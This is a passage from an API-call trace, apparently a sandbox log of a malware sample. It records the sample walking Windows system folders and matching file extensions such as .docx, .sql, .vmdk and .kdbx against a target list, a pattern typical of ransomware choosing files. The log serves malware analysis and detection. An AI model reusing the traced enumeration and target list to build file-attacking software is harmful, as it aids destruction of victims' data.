(lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.090] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 1 [0040.090] PathCombineW (in: pszDest=0x2e4d848, pszDir="C:\\Program Files\\Common Files\\System", pszFile="en-US" | out: pszDest="C:\\Program Files\\Common Files\\System\\en-US") returned="C:\\Program Files\\Common Files\\System\\en-US" [0040.090] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\System\\en-US") returned 0x0 [0040.090] PathCombineW (in: pszDest=0x2e4d1c0, pszDir="C:\\Program Files\\Common Files\\System\\en-US", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\System\\en-US\\*") returned="C:\\Program Files\\Common Files\\System\\en-US\\*" [0040.090] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\en-US\\*", lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 0x54ad60 [0040.091] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.091] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.091] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\en-US", pszFile="wab32res.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui") returned="C:\\Program Files\\Common Files\\System\\en-US\\wab32res.dll.mui" [0040.091] PathFindExtensionW (pszPath="wab32res.dll.mui") returned=".mui" [0040.091] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".mui.") returned 5 [0040.091] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0040.091] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 0 [0040.091] FindClose (in: hFindFile=0x54ad60 | out: hFindFile=0x54ad60) returned 1 [0040.091] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 1 [0040.091] PathCombineW (in: pszDest=0x2e4d848, pszDir="C:\\Program Files\\Common Files\\System", pszFile="msadc" | out: pszDest="C:\\Program Files\\Common Files\\System\\msadc") returned="C:\\Program Files\\Common Files\\System\\msadc" [0040.091] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\System\\msadc") returned 0x0 [0040.091] PathCombineW (in: pszDest=0x2e4d1c0, pszDir="C:\\Program Files\\Common Files\\System\\msadc", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\System\\msadc\\*") returned="C:\\Program Files\\Common Files\\System\\msadc\\*" [0040.091] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\*", lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 0x54ad60 [0040.096] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.096] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.096] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\msadc", pszFile="adcjavas.inc" | out: pszDest="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc") returned="C:\\Program Files\\Common Files\\System\\msadc\\adcjavas.inc" [0040.096] PathFindExtensionW (pszPath="adcjavas.inc") returned=".inc" [0040.096] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".inc.") returned 5 [0040.096] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".inc.") returned 0x0 [0040.096] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.096] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\msadc", pszFile="adcvbs.inc" | out: pszDest="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc") returned="C:\\Program Files\\Common Files\\System\\msadc\\adcvbs.inc" [0040.096] PathFindExtensionW (pszPath="adcvbs.inc") returned=".inc" [0040.097] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".inc.") returned 5 [0040.097] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".inc.") returned 0x0 [0040.097] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.097] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\msadc", pszFile="en-US" | out: pszDest="C:\\Program Files\\Common Files\\System\\msadc\\en-US") returned="C:\\Program Files\\Common Files\\System\\msadc\\en-US" [0040.097] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\System\\msadc\\en-US") returned 0x0 [0040.097] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\System\\msadc\\en-US", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*") returned="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*" [0040.097] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ade0 [0040.107] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.107] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.107] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\System\\msadc\\en-US", pszFile="msadcer.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui") returned="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcer.dll.mui" [0040.107] PathFindExtensionW (pszPath="msadcer.dll.mui") returned=".mui" [0040.107] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0040.107] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0040.108] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.108] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\System\\msadc\\en-US", pszFile="msadcfr.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcfr.dll.mui") returned="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcfr.dll.mui" [0040.108] PathFindExtensionW (pszPath="msadcfr.dll.mui") returned=".mui" [0040.108] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0040.108] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0040.108] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.108] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\System\\msadc\\en-US", pszFile="msadcor.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui") returned="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msadcor.dll.mui" [0040.108] PathFindExtensionW (pszPath="msadcor.dll.mui") returned=".mui" [0040.108] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0040.108] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0040.108] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.108] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\System\\msadc\\en-US", pszFile="msaddsr.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui") returned="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msaddsr.dll.mui" [0040.108] PathFindExtensionW (pszPath="msaddsr.dll.mui") returned=".mui" [0040.108] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0040.108] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0040.108] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.108] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\System\\msadc\\en-US", pszFile="msdaprsr.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui") returned="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaprsr.dll.mui" [0040.108] PathFindExtensionW (pszPath="msdaprsr.dll.mui") returned=".mui" [0040.108] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0040.108] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0040.109] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0040.111] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\System\\msadc\\en-US", pszFile="msdaremr.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui") returned="C:\\Program Files\\Common Files\\System\\msadc\\en-US\\msdaremr.dll.mui" [0040.111] PathFindExtensionW (pszPath="msdaremr.dll.mui") returned=".mui" [0040.111] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0040.111] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0040.111] FindNextFileW (in: hFindFile=0x54ade0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0040.111] FindClose (in: hFindFile=0x54ade0 | out: hFindFile=0x54ade0) returned 1 [0040.112] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.112] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\msadc", pszFile="handler.reg" | out: pszDest="C:\\Program Files\\Common Files\\System\\msadc\\handler.reg") returned="C:\\Program Files\\Common Files\\System\\msadc\\handler.reg" [0040.112] PathFindExtensionW (pszPath="handler.reg") returned=".reg" [0040.112] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".reg.") returned 5 [0040.112] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".reg.") returned 0x0 [0040.112] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.112] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\msadc", pszFile="handsafe.reg" | out: pszDest="C:\\Program Files\\Common Files\\System\\msadc\\handsafe.reg") returned="C:\\Program Files\\Common Files\\System\\msadc\\handsafe.reg" [0040.112] PathFindExtensionW (pszPath="handsafe.reg") returned=".reg" [0040.113] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".reg.") returned 5 [0040.113] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".reg.") returned 0x0 [0040.113] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.113] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\msadc", pszFile="msadce.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll") returned="C:\\Program Files\\Common Files\\System\\msadc\\msadce.dll" [0040.113] PathFindExtensionW (pszPath="msadce.dll") returned=".dll" [0040.113] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.113] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.113] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.113] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\msadc", pszFile="msadcer.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll") returned="C:\\Program Files\\Common Files\\System\\msadc\\msadcer.dll" [0040.113] PathFindExtensionW (pszPath="msadcer.dll") returned=".dll" [0040.113] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.113] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.113] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.113] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\msadc", pszFile="msadcf.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\msadc\\msadcf.dll") returned="C:\\Program Files\\Common Files\\System\\msadc\\msadcf.dll" [0040.113] PathFindExtensionW (pszPath="msadcf.dll") returned=".dll" [0040.113] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.113] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.114] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.114] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\msadc", pszFile="msadcfr.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\msadc\\msadcfr.dll") returned="C:\\Program Files\\Common Files\\System\\msadc\\msadcfr.dll" [0040.114] PathFindExtensionW (pszPath="msadcfr.dll") returned=".dll" [0040.114] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.114] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.114] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.114] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\msadc", pszFile="msadco.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll") returned="C:\\Program Files\\Common Files\\System\\msadc\\msadco.dll" [0040.114] PathFindExtensionW (pszPath="msadco.dll") returned=".dll" [0040.114] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.114] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.114] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.114] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\msadc", pszFile="msadcor.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll") returned="C:\\Program Files\\Common Files\\System\\msadc\\msadcor.dll" [0040.114] PathFindExtensionW (pszPath="msadcor.dll") returned=".dll" [0040.114] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.114] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.115] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.115] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\msadc", pszFile="msadcs.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\msadc\\msadcs.dll") returned="C:\\Program Files\\Common Files\\System\\msadc\\msadcs.dll" [0040.115] PathFindExtensionW (pszPath="msadcs.dll") returned=".dll" [0040.115] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.115] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.115] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.115] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\msadc", pszFile="msadds.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll") returned="C:\\Program Files\\Common Files\\System\\msadc\\msadds.dll" [0040.115] PathFindExtensionW (pszPath="msadds.dll") returned=".dll" [0040.115] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.115] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.117] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.117] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\msadc", pszFile="msaddsr.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll") returned="C:\\Program Files\\Common Files\\System\\msadc\\msaddsr.dll" [0040.117] PathFindExtensionW (pszPath="msaddsr.dll") returned=".dll" [0040.117] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.117] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.117] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.117] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\msadc", pszFile="msdaprsr.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll") returned="C:\\Program Files\\Common Files\\System\\msadc\\msdaprsr.dll" [0040.118] PathFindExtensionW (pszPath="msdaprsr.dll") returned=".dll" [0040.118] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.118] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".dll.") returned 0x0 [0040.118] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0040.118] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\System\\msadc", pszFile="msdaprst.dll" | out: pszDest="C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll") returned="C:\\Program Files\\Common Files\\System\\msadc\\msdaprst.dll" [0040.118] PathFindExtensionW (pszPath="msdaprst.dll") returned=".dll" [0040.118] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".dll.") returned 5 [0040.118] StrStrIW 